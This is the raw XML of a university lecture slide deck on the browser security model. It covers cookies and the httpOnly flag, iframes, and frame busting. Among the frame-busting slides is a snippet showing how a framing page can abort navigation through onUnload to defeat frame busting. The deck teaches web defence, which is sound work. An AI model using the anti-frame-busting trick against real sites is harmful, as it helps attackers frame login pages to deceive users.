            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1692275"/>
            <a:ext cx="1128713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2" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288"/>
            <a:ext cx="9144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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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4" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2759075"/>
            <a:ext cx="11430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5545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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6" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074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 sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="20732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48" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600200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accent2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2301875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345550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="48006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HTTP Header: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Set-cookie:	NAME=VALUE ;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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	httpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3898900"/>
            <a:ext cx="8022453" cy="2529923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 dirty="0"/>
              <a:t>  Cookie sent over HTTP(s),  but not accessible to scripts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cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> …  but does not stop most other risks of XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>bugs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55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Frames and frame busting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394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2164140"/>
            <a:ext cx="7010400" cy="156966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2700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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&lt;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 name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=“http://www.google.com/”&gt;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       This text is ignored by most browsers.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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14673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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146739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524000"/>
            <a:ext cx="8001000" cy="1791260"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embed HTML documents in other documents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1467397" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="4106139"/>
          <a:ext cx="4343400" cy="2193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6" name="Image" r:id="rId3" imgW="3873016" imgH="1955556" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="3873016" imgH="195555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106139"/>
                        <a:ext cx="4343400" cy="21930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 type="none" w="lg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739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8418" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="7031" t="31662" r="77435" b="47917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3081338"/>
            <a:ext cx="243840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68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Frame Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146842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114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Goal:  prevent web page from loading in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>example: opening login page in a frame will display</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>correct passmark image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Frame busting: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468421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4724826"/>
            <a:ext cx="5427255" cy="83099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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146944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Problem:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>OnUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> event</a:t>
            </a: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 smtClean="0"/>
              <a:t>Try this instead:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="958366" y="2817168"/>
            <a:ext cx="7119321" cy="46166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2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript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 err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cause_an_abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;)"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4410943"/>
            <a:ext cx="5427255" cy="13111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2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>if   (top != self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>else {  …  code of page here …}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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation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Navigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security User Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames and frame busting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programming poll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Familiar with basic html?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed a web application using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache?                  PHP?                Ruby?        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python?                   SQL?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript?              CSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know about: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NaCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webworkers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?    CSP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Resource: 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http://www.w3schools.com/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web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Safely browse the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users should be able to visit a variety of web sites, without incurring harm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stolen information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site A cannot compromise session at Site B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Support secure web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications delivered over the web should be able to achieve the same security properties as stand-alone applications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05/18/2007" val="LastModified"/>
</p:tagLst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lg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35691</TotalTime>
  <Words>3047</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>701</Paragraphs>
  <Slides>75</Slides>
  <Notes>22</Notes>
  <HiddenSlides>2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9" baseType="lpstr">
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>3_Blueprint</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Browser Security Model</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web vs System vulnerabilities</vt:lpstr>
      <vt:lpstr>Reported Web Vulnerabilities "In the Wild"</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>Five lectures on Web security</vt:lpstr>
      <vt:lpstr>Web programming poll</vt:lpstr>
      <vt:lpstr>Goals of web security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Threat Models</vt:lpstr>
      <vt:lpstr>Malware attacker</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Changing HTML using Script, DOM</vt:lpstr>
      <vt:lpstr>HTML Image Tags</vt:lpstr>
      <vt:lpstr>Image tag security issues</vt:lpstr>
      <vt:lpstr>JavaScript onError</vt:lpstr>
      <vt:lpstr>JavaScript timing</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Remote scripting</vt:lpstr>
      <vt:lpstr>Simple remote scripting example </vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Frame and iFrame</vt:lpstr>
      <vt:lpstr>Windows Interact</vt:lpstr>
      <vt:lpstr>Analogy</vt:lpstr>
      <vt:lpstr>Policy Goals</vt:lpstr>
      <vt:lpstr>Browser security mechanism</vt:lpstr>
      <vt:lpstr>Components of browser security policy</vt:lpstr>
      <vt:lpstr>Library import excluded from SOP</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>Additional mechanisms</vt:lpstr>
      <vt:lpstr>Communication</vt:lpstr>
      <vt:lpstr>window.postMessage</vt:lpstr>
      <vt:lpstr>postMessage syntax</vt:lpstr>
      <vt:lpstr>Why include “targetOrigin”?</vt:lpstr>
      <vt:lpstr>Navigation</vt:lpstr>
      <vt:lpstr>A Guninski Attack</vt:lpstr>
      <vt:lpstr>What should the policy be?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Window Policy Anomaly</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security User Interface</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed content and network attacks</vt:lpstr>
      <vt:lpstr>Lock Icon 2.0</vt:lpstr>
      <vt:lpstr>Finally:   the status Bar</vt:lpstr>
      <vt:lpstr>Cookies:   client state</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie authentication</vt:lpstr>
      <vt:lpstr>Cookie Security Policy</vt:lpstr>
      <vt:lpstr>Secure Cookies</vt:lpstr>
      <vt:lpstr>httpOnly Cookies</vt:lpstr>
      <vt:lpstr>Frames and frame busting</vt:lpstr>
      <vt:lpstr>Frames</vt:lpstr>
      <vt:lpstr>Frame Busting</vt:lpstr>
      <vt:lpstr>Better Frame Busting</vt:lpstr>
      <vt:lpstr>Summary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Games and the Impossibility of Realizable Ideal Functionality</dc:title>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>Suman Jana</cp:lastModifiedBy>
  <cp:revision>6912</cp:revision>
  <cp:lastPrinted>2011-04-22T01:01:27Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-09T01:45:45Z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C:\Documents\cs242\notes\web-slides</vt:lpwstr>
  </property>
</Properties>
</file>